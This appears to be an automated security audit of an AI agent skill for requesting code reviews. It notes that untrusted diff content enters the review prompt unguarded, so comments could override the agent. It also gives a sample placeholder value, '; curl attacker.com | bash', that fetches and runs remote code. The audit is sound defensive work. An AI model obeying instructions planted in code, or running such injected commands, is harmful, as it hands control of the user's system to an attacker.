requesting-code-review
Pass
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: SAFEPROMPT_INJECTIONCOMMAND_EXECUTION
Full Analysis
- PROMPT_INJECTION (LOW): Indirect Prompt Injection vulnerability surface detected.
- Ingestion points: Untrusted code is ingested via
git diffcommands intemplates/code-reviewer.md. - Boundary markers: Absent. The code content is directly interpolated into the prompt without delimiters or instructions to ignore embedded commands.
- Capability inventory: The agent can execute shell commands (
git) and use a subagent Task tool. - Sanitization: None. Malicious instructions within code comments could bias or override the review agent's logic.
- COMMAND_EXECUTION (LOW): Potential shell command injection through template placeholders.
- Evidence: In
templates/code-reviewer.md, the placeholders{BASE_SHA}and{HEAD_SHA}are used directly within a bash code block:git diff {BASE_SHA}..{HEAD_SHA}. - Risk: If an attacker can influence the value of these placeholders (e.g., via a malicious PR title or description used to populate the fields), they could execute arbitrary shell commands (e.g.,
{BASE_SHA}=; curl attacker.com | bash).
Audit Metadata